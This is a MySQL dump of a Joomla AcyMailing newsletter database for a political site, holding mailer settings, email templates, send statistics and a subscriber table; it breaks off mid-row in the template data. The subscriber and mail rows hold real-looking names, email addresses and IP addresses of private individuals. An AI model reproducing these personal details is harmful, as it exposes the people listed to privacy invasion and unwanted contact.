-- MySQL dump 10.13  Distrib 5.7.44, for Linux (x86_64)
--
-- Host: localhost    Database: nsadmin_jo151
-- ------------------------------------------------------
-- Server version	5.7.44

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `jos_acymailing_config`
--

DROP TABLE IF EXISTS `jos_acymailing_config`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_acymailing_config` (
  `namekey` varchar(200) NOT NULL,
  `value` varchar(250) NOT NULL,
  PRIMARY KEY (`namekey`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_acymailing_config`
--

LOCK TABLES `jos_acymailing_config` WRITE;
/*!40000 ALTER TABLE `jos_acymailing_config` DISABLE KEYS */;
INSERT INTO `jos_acymailing_config` VALUES ('level','Starter'),('version','1.3.0'),('from_name','RetakeOurGov.com'),('from_email','wes@RetakeOurGov.com'),('reply_name','RetakeOurGov.com'),('reply_email','wes@RetakeOurGov.com'),('bounce_email',''),('add_names','1'),('mailer_method','phpmail'),('encoding_format','8bit'),('charset','UTF-8'),('word_wrapping','150'),('hostname',''),('embed_images','0'),('embed_files','1'),('multiple_part','1'),('sendmail_path','/usr/sbin/sendmail'),('smtp_host','localhost'),('smtp_port',''),('smtp_secured',''),('smtp_auth','0'),('smtp_username',''),('smtp_password',''),('smtp_keepalive','1'),('queue_nbmail','60'),('queue_type','auto'),('queue_delay','3600'),('queue_try','3'),('queue_pause','2'),('allow_visitor','1'),('require_confirmation','0'),('priority_newsletter','3'),('allowedfiles','zip,doc,docx,pdf,xls,txt,gzip,rar,jpg,gif,xlsx,pps,csv,bmp,epg,ico,odg,odp,ods,odt,png,ppt,swf,xcf'),('uploadfolder','components/com_acymailing/upload'),('editor','0'),('confirm_redirect',''),('subscription_message','1'),('notification_unsuball','wes@retakeourgov.com'),('cron_next','1277081751'),('confirmation_message','1'),('welcome_message','1'),('unsub_message','1'),('cron_last','0'),('cron_fromip',''),('cron_report',''),('cron_frequency','900'),('cron_sendreport','2'),('cron_sendto','nsadmin@nsconstruct.com'),('cron_fullreport','1'),('cron_savereport','2'),('cron_savefolder','administrator/components/com_acymailing/upload/report.log'),('cron_savepath','administrator/components/com_acymailing/logs/report.log'),('notification_created','wes@retakeourgov.com'),('notification_accept',''),('notification_refuse','wes@retakeourgov.com'),('forward','0'),('description_starter','Joomla!<sup style=\"font-size:4px;\">TM</sup> Mailing Extension'),('description_essential','Joomla!<sup style=\"font-size:4px;\">TM</sup> E-mail Marketing'),('description_business','Joomla!<sup style=\"font-size:4px;\">TM</sup> E-mail Marketing'),('description_enterprise','Joomla!<sup style=\"font-size:4px;\">TM</sup> Marketing Campaign'),('priority_followup','2'),('unsub_redirect','http://www.nsconstruct.com/retakeourgov/index.php?option=com_acymailing&ctrl=lists'),('show_footer','1'),('use_sef','0'),('itemid','0'),('css_module','default'),('css_frontend','default'),('css_backend','default'),('installcomplete','1'),('bounce_email_bounce','delete'),('bounce_regex_bounce','deliver|daemon|fail|system|return|impos'),('bounce_action_bounce','unsub'),('bounce_rules_bounce','Mailbox not accessible'),('bounce_email_end','forward'),('bounce_forward_end','nsadmin@nsconstruct.com'),('bounce_rules_end','Final Action'),('Starter','0'),('Essential','1'),('Business','2'),('Enterprise','3'),('allow_modif','data'),('sub_redirect','http://www.nsconstruct.com/retakeourgov/index.php?option=com_acymailing&ctrl=lists'),('modif_redirect','http://www.nsconstruct.com/retakeourgov/index.php?option=com_acymailing&ctrl=lists'),('unsubscription_message','1'),('confirm_message','1'),('frontend_pdf','0'),('frontend_print','0'),('show_description','1'),('show_headings','1'),('show_senddate','1'),('show_filter','1');
/*!40000 ALTER TABLE `jos_acymailing_config` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_acymailing_fields`
--

DROP TABLE IF EXISTS `jos_acymailing_fields`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_acymailing_fields` (
  `fieldid` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
  `fieldname` varchar(250) NOT NULL,
  `namekey` varchar(50) NOT NULL,
  `type` varchar(50) DEFAULT NULL,
  `value` text NOT NULL,
  `published` tinyint(3) unsigned NOT NULL DEFAULT '1',
  `ordering` smallint(5) unsigned DEFAULT '99',
  `options` text,
  `core` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `required` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `backend` tinyint(3) unsigned NOT NULL DEFAULT '1',
  `frontcomp` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `default` varchar(250) DEFAULT NULL,
  PRIMARY KEY (`fieldid`),
  UNIQUE KEY `namekey` (`namekey`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_acymailing_fields`
--

LOCK TABLES `jos_acymailing_fields` WRITE;
/*!40000 ALTER TABLE `jos_acymailing_fields` DISABLE KEYS */;
INSERT INTO `jos_acymailing_fields` VALUES (1,'NAMECAPTION','name','text','',1,1,'',1,1,1,1,''),(2,'EMAILCAPTION','email','text','',1,2,'',1,1,1,1,''),(3,'RECEIVE','html','radio','0::JOOMEXT_TEXT\n1::HTML',1,3,'',1,1,1,1,'1');
/*!40000 ALTER TABLE `jos_acymailing_fields` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_acymailing_list`
--

DROP TABLE IF EXISTS `jos_acymailing_list`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_acymailing_list` (
  `name` varchar(250) NOT NULL,
  `description` text,
  `ordering` smallint(10) unsigned DEFAULT NULL,
  `listid` smallint(10) unsigned NOT NULL AUTO_INCREMENT,
  `published` tinyint(11) DEFAULT NULL,
  `userid` int(10) unsigned DEFAULT NULL,
  `alias` varchar(250) DEFAULT NULL,
  `color` varchar(30) DEFAULT NULL,
  `visible` tinyint(4) NOT NULL DEFAULT '1',
  `welmailid` mediumint(11) DEFAULT NULL,
  `unsubmailid` mediumint(11) DEFAULT NULL,
  `type` enum('list','campaign') NOT NULL DEFAULT 'list',
  `access_sub` varchar(250) DEFAULT 'all',
  `access_manage` varchar(250) NOT NULL DEFAULT 'none',
  `languages` varchar(250) NOT NULL DEFAULT 'all',
  PRIMARY KEY (`listid`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_acymailing_list`
--

LOCK TABLES `jos_acymailing_list` WRITE;
/*!40000 ALTER TABLE `jos_acymailing_list` DISABLE KEYS */;
INSERT INTO `jos_acymailing_list` VALUES ('Newsletters','Receive our latest news',2,1,1,63,'mailing_list','#CCCCCC',1,NULL,NULL,'list','all','none','all'),('Test 1','<p>Welcome to Test1 email list</p>',1,2,1,64,'test-1','#cc0000',1,NULL,9,'list','all','none','all');
/*!40000 ALTER TABLE `jos_acymailing_list` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_acymailing_listcampaign`
--

DROP TABLE IF EXISTS `jos_acymailing_listcampaign`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_acymailing_listcampaign` (
  `campaignid` smallint(10) unsigned NOT NULL,
  `listid` smallint(10) unsigned NOT NULL,
  PRIMARY KEY (`campaignid`,`listid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_acymailing_listcampaign`
--

LOCK TABLES `jos_acymailing_listcampaign` WRITE;
/*!40000 ALTER TABLE `jos_acymailing_listcampaign` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_acymailing_listcampaign` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_acymailing_listmail`
--

DROP TABLE IF EXISTS `jos_acymailing_listmail`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_acymailing_listmail` (
  `listid` int(10) unsigned NOT NULL,
  `mailid` int(10) unsigned NOT NULL,
  PRIMARY KEY (`listid`,`mailid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_acymailing_listmail`
--

LOCK TABLES `jos_acymailing_listmail` WRITE;
/*!40000 ALTER TABLE `jos_acymailing_listmail` DISABLE KEYS */;
INSERT INTO `jos_acymailing_listmail` VALUES (1,8),(2,10);
/*!40000 ALTER TABLE `jos_acymailing_listmail` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_acymailing_listsub`
--

DROP TABLE IF EXISTS `jos_acymailing_listsub`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_acymailing_listsub` (
  `listid` smallint(11) unsigned NOT NULL,
  `subid` int(11) unsigned NOT NULL,
  `subdate` int(11) unsigned DEFAULT NULL,
  `unsubdate` int(11) unsigned DEFAULT NULL,
  `status` tinyint(4) NOT NULL,
  PRIMARY KEY (`listid`,`subid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_acymailing_listsub`
--

LOCK TABLES `jos_acymailing_listsub` WRITE;
/*!40000 ALTER TABLE `jos_acymailing_listsub` DISABLE KEYS */;
INSERT INTO `jos_acymailing_listsub` VALUES (1,1,1276948137,NULL,1),(1,2,1276948137,NULL,1),(1,15,1277072250,NULL,1),(1,14,1277072250,NULL,1),(1,13,1277072250,NULL,1),(1,12,1276956967,NULL,1),(1,11,1276956593,NULL,1),(1,10,1276954364,NULL,1),(1,16,1277072250,NULL,1),(2,16,1277082481,1277081731,1);
/*!40000 ALTER TABLE `jos_acymailing_listsub` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_acymailing_mail`
--

DROP TABLE IF EXISTS `jos_acymailing_mail`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_acymailing_mail` (
  `mailid` mediumint(10) unsigned NOT NULL AUTO_INCREMENT,
  `subject` varchar(250) NOT NULL,
  `body` longtext NOT NULL,
  `altbody` longtext NOT NULL,
  `published` tinyint(4) DEFAULT '1',
  `senddate` int(10) unsigned DEFAULT NULL,
  `created` int(10) unsigned DEFAULT NULL,
  `fromname` varchar(250) NOT NULL,
  `fromemail` varchar(250) NOT NULL,
  `replyname` varchar(250) NOT NULL,
  `replyemail` varchar(250) NOT NULL,
  `type` enum('news','autonews','followup','unsub','welcome','notification') NOT NULL DEFAULT 'news',
  `visible` tinyint(4) NOT NULL DEFAULT '1',
  `userid` int(10) unsigned DEFAULT NULL,
  `alias` varchar(250) DEFAULT NULL,
  `attach` text,
  `html` tinyint(4) NOT NULL DEFAULT '1',
  `tempid` smallint(11) NOT NULL DEFAULT '0',
  `key` varchar(200) DEFAULT NULL,
  `frequency` varchar(50) DEFAULT NULL,
  `params` text,
  `sentby` int(11) unsigned DEFAULT NULL,
  PRIMARY KEY (`mailid`),
  KEY `senddate` (`senddate`)
) ENGINE=MyISAM AUTO_INCREMENT=11 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_acymailing_mail`
--

LOCK TABLES `jos_acymailing_mail` WRITE;
/*!40000 ALTER TABLE `jos_acymailing_mail` DISABLE KEYS */;
INSERT INTO `jos_acymailing_mail` VALUES (1,'New Subscriber on your website','<p>Hello {subtag:name},</p><p>A new user has been created in AcyMailing : </p><blockquote><p>Name : {user:name}</p><p>Email : {user:email}</p><p>IP : {user:ip} </p></blockquote>','',1,NULL,NULL,'','','','','notification',0,NULL,'notification_created',NULL,1,0,NULL,NULL,NULL,NULL),(2,'A User unsubscribed from all your lists','<p>Hello {subtag:name},</p><p>The user {user:name} unsubscribed from all your lists</p>','',1,NULL,NULL,'','','','','notification',0,NULL,'notification_unsuball',NULL,1,0,NULL,NULL,NULL,NULL),(3,'A User refuses to receive e-mails from your website','<p>The User {user:name} : {user:email} refuses to receive any e-mail anymore from your website.</p>','',1,NULL,NULL,'','','','','notification',0,NULL,'notification_refuse',NULL,1,0,NULL,NULL,NULL,NULL),(4,'{subtag:name}, please confirm your subscription','<p> Hello {subtag:name}, </p><p><strong>{confirm}Click here to confirm your subscription{/confirm}</strong></p>','',1,NULL,NULL,'','','','','notification',0,NULL,'confirmation',NULL,1,0,NULL,NULL,NULL,NULL),(5,'AcyMailing Cron Report','<p>{report}</p><p>{detailreport}</p>','',1,NULL,NULL,'','','','','notification',0,NULL,'report',NULL,1,0,NULL,NULL,NULL,NULL),(6,'A Newsletter has been generated : \"{subject}\"','<p>The Newsletter issue {issuenb} has been generated : </p><p>Subject : {subject}</p><p>{body}</p>','',1,NULL,NULL,'','','','','notification',0,NULL,'notification_autonews',NULL,1,0,NULL,NULL,NULL,NULL),(7,'Modify your subscription','<p>Hello {subtag:name}, </p><p>You requested some changes on your subscription,</p><p>Please {modify}click here{/modify} to be identified as the owner of this account and then modify your subscription.</p>','',1,NULL,NULL,'','','','','notification',0,NULL,'modif',NULL,1,0,NULL,NULL,NULL,NULL),(8,'New News','<div style=\"background-color:#e2e8df;font-size:100%;font-family:Tahoma, Geneva, Kalimati, sans-serif;color:#8a8a8a;text-align:center\">\r\n<table style=\"text-align:left;margin:auto;\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"560\">\r\n<tbody>\r\n<tr>\r\n<td class=\"hideonline\" style=\"font-size:10px;color:#000000;margin:auto;text-align:center;\" colspan=\"3\">This email contains graphics, so if you don\'t see them, {readonline}view it in your browser{/readonline}.</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" height=\"10\"> </td>\r\n</tr>\r\n<tr>\r\n<td width=\"37\"> </td>\r\n<td width=\"496\" valign=\"top\" bgcolor=\"#fbfbf7\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\" height=\"20\"> </td>\r\n</tr>\r\n<tr>\r\n<td width=\"20\"> </td>\r\n<td style=\"background-color:#F9F7D3\" width=\"456\" height=\"110\">\r\n<table style=\"height: 110px;\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"456\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"3\" height=\"11\"> </td>\r\n</tr>\r\n<tr>\r\n<td width=\"7\"> </td>\r\n<td><img src=\"http://www.acyba.com/images/templates/newsletter-1/logo-icon.png\" border=\"0\" /></td>\r\n<td valign=\"top\">\r\n<table style=\"height: 100%;\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\">\r\n<tbody>\r\n<tr>\r\n<td height=\"71\" align=\"right\" valign=\"top\">\r\n<h1 style=\"margin-bottom:0;margin-top:0;font-family:Tahoma, Geneva, Kalimati, sans-serif;font-size:26px;color:#d47e7e;vertical-align:top;\">AcyMailing is Out!</h1>\r\n</td>\r\n<td width=\"15\"> </td>\r\n</tr>\r\n<tr>\r\n<td height=\"15\" align=\"right\" valign=\"baseline\"><img src=\"http://www.acyba.com/images/templates/newsletter-1/company-name.png\" border=\"0\" height=\"15\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" height=\"3\"> </td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td width=\"20\"> </td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"5\">\r\n<table border=\"0\" width=\"100%\">\r\n<tbody>\r\n<tr>\r\n<td width=\"60\"> </td>\r\n<td>\r\n<table border=\"0\" width=\"100%\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h3 style=\"color:#8a8a8a;font-weight:normal;font-size:100%;margin:0;\">E-Mail</h3>\r\n<h6 style=\"background-color:#d39f9f;margin:0;\"> </h6>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size:10px\" width=\"280\" align=\"justify\" valign=\"top\">Electronic mail, often abbreviated as email or e-mail, is a method of exchanging digital messages, designed primarily for human use. E-mail systems are based on a store-and-forward model in which e-mail computer server systems accept, forward, deliver and store messages on behalf of users, who only need to connect to the e-mail infrastructure, typically an e-mail server, with a network-enabled device (e.g., a personal computer) for the duration of message submission or retrieval.<br /><a href=\"http://en.wikipedia.org/wiki/E-mail\">Wikipedia</a></td>\r\n<td><img src=\"http://www.acyba.com/images/templates/newsletter-1/acymailing.png\" border=\"0\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td width=\"60\"> </td>\r\n</tr>\r\n<tr>\r\n<td width=\"60\"> </td>\r\n<td>\r\n<table border=\"0\" width=\"100%\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h3 style=\"color:#8a8a8a;font-weight:normal;font-size:100%;margin:0;\">Marketing Campaign</h3>\r\n<h6 style=\"background-color:#d39f9f;margin:0;\"> </h6>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size:10px\" width=\"140\" align=\"justify\" valign=\"top\">Marketing is an integrated communications-based process through which individuals and communities are informed or persuaded that existing and newly-identified needs and wants may be satisfied by the products and services of others.</td>\r\n<td><img src=\"components/com_acymailing/templates/newsletter-1/vert-separator.png\" border=\"0\" /></td>\r\n<td><img src=\"http://www.acyba.com/images/templates/newsletter-1/essential.png\" border=\"0\" /></td>\r\n<td><img src=\"components/com_acymailing/templates/newsletter-1/vert-separator.png\" border=\"0\" /></td>\r\n<td style=\"font-size:10px\" width=\"140\" align=\"justify\" valign=\"top\">Marketing is used to create the customer, to keep the customer and to satisfy the customer. <a href=\"http://en.wikipedia.org/wiki/Marketing_campaign\">Wikipedia</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td width=\"60\"> </td>\r\n</tr>\r\n<tr>\r\n<td width=\"60\"> </td>\r\n<td>\r\n<table border=\"0\" width=\"100%\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h3 style=\"color:#8a8a8a;font-weight:normal;font-size:100%;margin:0;\">Joomla!</h3>\r\n<h6 style=\"background-color:#d39f9f;margin:0;\"> </h6>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size:10px\" width=\"200\" align=\"justify\" valign=\"top\">Joomla! is a content management system platform for publishing content on the World Wide Web and intranets as well as a Model–view–controller (MVC) Web Application Development framework.</td>\r\n<td><img src=\"components/com_acymailing/templates/newsletter-1/vert-separator.png\" border=\"0\" /></td>\r\n<td style=\"font-size:10px\" width=\"200\" align=\"justify\" valign=\"top\">The system includes features such as page caching to improve performance, RSS feeds, printable versions of pages, news flashes, blogs, polls, website searching, and language internationalization.<br /><a href=\"http://en.wikipedia.org/wiki/Joomla\">Wikipedia</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td width=\"60\"> </td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td width=\"27\"> </td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\"><img src=\"components/com_acymailing/templates/newsletter-1/page-footer.png\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td class=\"hideonline\" style=\"font-size:10px;color:#000000;margin:auto;text-align:center;\" colspan=\"3\">Not interested any more? {unsubscribe}Unsubscribe{/unsubscribe}</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>','',1,1276951811,1276951583,'Wes Nakagiri','jhbrake@comcast.net','Wes Nakagiri','jhbrake@nsconstruct.com','news',1,63,'new-news','a:1:{i:0;O:8:\"stdClass\":3:{s:8:\"filename\";s:14:\"phpmyadmin.jpg\";s:4:\"size\";i:106138;s:9:\"extension\";s:3:\"jpg\";}}',1,1,'ae9c7cf95bcc4bf6ddc2fa00f872d4cb',NULL,NULL,63),(9,'Unsubscribe','<p>You have unsubscribed from this email list</p>','',1,NULL,1277071856,'RetakeOurGov.com','nsadmin@nsconstruct.com','RetakeOurGov.com','nsadmin@nsconstruct.com','unsub',1,64,'unsubscribe',NULL,1,0,'aee472c1bdc68a5257886195370e5c5a',NULL,NULL,NULL),(10,'test','<div style=\"BACKGROUND-COLOR: #e2e8df\">\r\n<p>{subtag:name}</p>\r\n<p> </p>\r\n<p>{unsubscribe}To unsubscribe from Test 1 email list click here{/unsubscribe}</p>\r\n</div>','',1,1277081631,1277079939,'','','','','news',1,64,'test','a:1:{i:0;O:8:\"stdClass\":3:{s:8:\"filename\";s:20:\"dada mail log in.doc\";s:4:\"size\";i:27648;s:9:\"extension\";s:3:\"doc\";}}',1,1,'4c6d29f8c1cefacdb629478039686e23',NULL,NULL,64);
/*!40000 ALTER TABLE `jos_acymailing_mail` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_acymailing_queue`
--

DROP TABLE IF EXISTS `jos_acymailing_queue`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_acymailing_queue` (
  `senddate` int(10) unsigned NOT NULL,
  `subid` int(10) unsigned NOT NULL,
  `mailid` mediumint(10) unsigned NOT NULL,
  `priority` tinyint(3) unsigned DEFAULT '3',
  `try` tinyint(3) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`subid`,`mailid`),
  KEY `senddate` (`senddate`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_acymailing_queue`
--

LOCK TABLES `jos_acymailing_queue` WRITE;
/*!40000 ALTER TABLE `jos_acymailing_queue` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_acymailing_queue` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_acymailing_stats`
--

DROP TABLE IF EXISTS `jos_acymailing_stats`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_acymailing_stats` (
  `mailid` mediumint(10) unsigned NOT NULL,
  `senthtml` int(10) unsigned NOT NULL DEFAULT '0',
  `senttext` int(10) unsigned NOT NULL DEFAULT '0',
  `senddate` int(10) unsigned NOT NULL,
  `openunique` mediumint(10) unsigned NOT NULL DEFAULT '0',
  `opentotal` int(10) unsigned NOT NULL DEFAULT '0',
  `bounceunique` mediumint(10) unsigned NOT NULL DEFAULT '0',
  `fail` mediumint(10) unsigned NOT NULL DEFAULT '0',
  `clicktotal` int(10) unsigned NOT NULL DEFAULT '0',
  `clickunique` mediumint(10) unsigned NOT NULL DEFAULT '0',
  `unsub` mediumint(10) unsigned NOT NULL DEFAULT '0',
  `forward` mediumint(10) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`mailid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_acymailing_stats`
--

LOCK TABLES `jos_acymailing_stats` WRITE;
/*!40000 ALTER TABLE `jos_acymailing_stats` DISABLE KEYS */;
INSERT INTO `jos_acymailing_stats` VALUES (8,6,0,1276951812,2,4,0,0,0,0,0,0),(10,1,0,1277081631,0,0,0,0,0,0,1,0);
/*!40000 ALTER TABLE `jos_acymailing_stats` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_acymailing_subscriber`
--

DROP TABLE IF EXISTS `jos_acymailing_subscriber`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_acymailing_subscriber` (
  `subid` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `email` varchar(200) NOT NULL,
  `userid` int(10) unsigned DEFAULT NULL,
  `name` varchar(250) NOT NULL,
  `created` int(10) unsigned DEFAULT NULL,
  `confirmed` tinyint(4) NOT NULL DEFAULT '0',
  `enabled` tinyint(4) NOT NULL DEFAULT '1',
  `accept` tinyint(4) NOT NULL DEFAULT '1',
  `ip` varchar(100) DEFAULT NULL,
  `html` tinyint(4) NOT NULL DEFAULT '1',
  `key` varchar(250) DEFAULT NULL,
  PRIMARY KEY (`subid`),
  UNIQUE KEY `email` (`email`),
  KEY `userid` (`userid`)
) ENGINE=MyISAM AUTO_INCREMENT=17 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_acymailing_subscriber`
--

LOCK TABLES `jos_acymailing_subscriber` WRITE;
/*!40000 ALTER TABLE `jos_acymailing_subscriber` DISABLE KEYS */;
INSERT INTO `jos_acymailing_subscriber` VALUES (1,'nsadmin@nsconstruct.com',62,'Donna Nakagiri',1276948137,1,1,1,NULL,1,'a1de62df46d33f011e690fcfee10812c'),(2,'jhbrake@comcast.net',63,'Jack B',1276948137,1,1,1,NULL,1,'a83d98333f8cbe3cffa33299bc202985'),(13,'wes@retakeourgov.com',64,'Wes Nakagiri',1277071356,1,1,1,'71.238.211.232',1,'cd2eb70180577d9da547bcc9c2d9460e'),(12,'info@adirondakchairs.net',NULL,'jhbrake',1276956967,0,1,1,'97.72.42.211',1,'99708199aa44ea6420413cb6f2033cb4'),(14,'cwiljanen@retakeourgov.com',NULL,'Carol Wiljanen',1277071682,1,1,1,'71.238.211.232',1,'6694c207d53a7c37b4ceba22a98f46af'),(11,'jack@adirondakchairs.net',NULL,'J Brake',1276955066,1,1,1,'97.72.42.211',1,'ba4b9ab0f8e23e92b978877b30a817a6'),(10,'jhbrake@live.com',NULL,'Jack Brake',1276954364,0,1,1,'97.72.42.211',1,'c096fec1624d34aaf7d16b7239c238c3'),(15,'pwiljanen@retakeourgov.com',NULL,'Paul Wiljanen',1277071734,1,1,1,'71.238.211.232',1,'208d122685217cddcae9cbed4ba39697'),(16,'wnakagiri@comcast.net',NULL,'Wes Nakagiri - comcast',1277071773,1,1,1,'71.238.211.232',1,'c4cbf75e75063e8e7d71cd5eb9538c3e');
/*!40000 ALTER TABLE `jos_acymailing_subscriber` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_acymailing_template`
--

DROP TABLE IF EXISTS `jos_acymailing_template`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_acymailing_template` (
  `tempid` smallint(11) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(250) DEFAULT NULL,
  `description` text,
  `body` longtext,
  `altbody` longtext,
  `created` int(10) unsigned DEFAULT NULL,
  `published` tinyint(4) NOT NULL DEFAULT '1',
  `premium` tinyint(4) NOT NULL DEFAULT '0',
  `ordering` smallint(10) unsigned NOT NULL DEFAULT '99',
  `namekey` varchar(50) NOT NULL,
  `styles` text,
  `subject` varchar(250) DEFAULT NULL,
  `stylesheet` text,
  PRIMARY KEY (`tempid`),
  UNIQUE KEY `namekey` (`namekey`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_acymailing_template`
--

LOCK TABLES `jos_acymailing_template` WRITE;
/*!40000 ALTER TABLE `jos_acymailing_template` DISABLE KEYS */;
INSERT INTO `jos_acymailing_template` VALUES (1,'White Shadow Red','1 header, 1 column, 3 vertical areas for articles.<br/><img src=\"components/com_acymailing/templates/newsletter-1/newsletter-1.png\"/>','<div style=\"background-color:#e2e8df;\">\r\n<p>{unsubscribe}To unsubscribe click here{/unsubscribe}</p>\r\n</div>','',NULL,1,1,1,'newsletter-1','a:6:{s:8:\"color_bg\";s:7:\"#e2e8df\";s:6:\"tag_h1\";s:89:\"color:#8a8a8a;font-weight:normal;font-size:14px;margin:0;border-bottom:5px solid #d39f9f;\";s:16:\"acymailing_unsub\";s:31:\"font-weight:bold;color:#000000;\";s:16:\"acymailing_title\";s:89:\"color:#8a8a8a;font-weight:normal;font-size:14px;margin:0;border-bottom:5px solid #d39f9f;\";s:19:\"acymailing_readmore\";s:14:\"color:#d39f9f;\";s:17:\"acymailing_online\";s:31:\"font-weight:bold;color:#000000;\";}','test',''),(2,'Clean White Pink','White based template with 1 header, 2 columns<br/><img src=\"components/com_acymailing/templates/newsletter-2/newsletter-2.png\"/>','<div style=\"background-color:#ffffff;font-size:100%;font-family:Tahoma, 